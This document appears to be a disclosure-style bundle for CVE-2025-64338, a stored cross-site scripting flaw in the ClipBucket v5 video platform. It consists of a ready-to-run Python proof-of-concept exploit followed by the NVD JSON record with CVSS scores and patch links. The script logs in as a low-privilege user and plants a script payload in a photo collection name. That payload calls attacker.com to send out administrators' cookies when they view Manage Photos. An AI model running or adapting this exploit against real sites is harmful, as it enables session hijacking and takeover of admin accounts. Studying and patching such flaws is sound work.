CVE-2025-64338

import requests import sys # CVE-2025-64338 PoC - ClipBucket v5 Stored XSS # Target: ClipBucket v5.5.2 <= #156 # Attack: Authenticated user creates photo collection with XSS payload in name TARGET_URL = "http://target-website.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # XSS Payload - Steal admin cookies XSS_PAYLOAD = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" def login(session): """Login as regular user with low privileges""" login_url = f"{TARGET_URL}/login.php" data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data) return "logout" in response.text or response.status_code == 200 def create_photo_collection(session): """Create photo collection with XSS payload in name""" create_url = f"{TARGET_URL}/actions/collections/create_collection.php" data = { "collection_name": XSS_PAYLOAD, "collection_type": "photos" } response = session.post(create_url, data=data) return response.status_code == 200 def main(): session = requests.Session() print("[*] Step 1: Logging in as low-privilege user...") if not login(session): print("[-] Login failed!") return print("[+] Login successful!") print("[*] Step 2: Creating photo collection with XSS payload...") if not create_photo_collection(session): print("[-] Collection creation failed!") return print("[+] Photo collection created with XSS payload!") print("[*] Payload will execute when admin visits Manage Photos page") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64338", "sourceIdentifier": "[email protected]", "published": "2025-11-07T05:16:10.167", "lastModified": "2025-12-31T18:30:53.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket v5 is an open source video sharing platform. In versions 5.5.2 - #156 and below, an authenticated regular user can create a photo collection whose Collection Name contains HTML/JavaScript payloads, which making ClipBucket’s Manage Photos feature vulnerable to Stored XSS. The payload is rendered unsafely in the Admin → Manage Photos interface, causing it to execute in the administrator’s browser, therefore allowing an attacker to target administrators and perform actions with elevated privileges. This issue is fixed in version 5.5.2 - #157."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndExcluding": "5.5.2-157", "matchCriteriaId": "3853CC60-97B9-4859-A4FC-F46AEEBF327B"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/8e3cf79ce2721fbebde68a05a9a1a6319f086bcc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-93rh-fxxx-j38j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}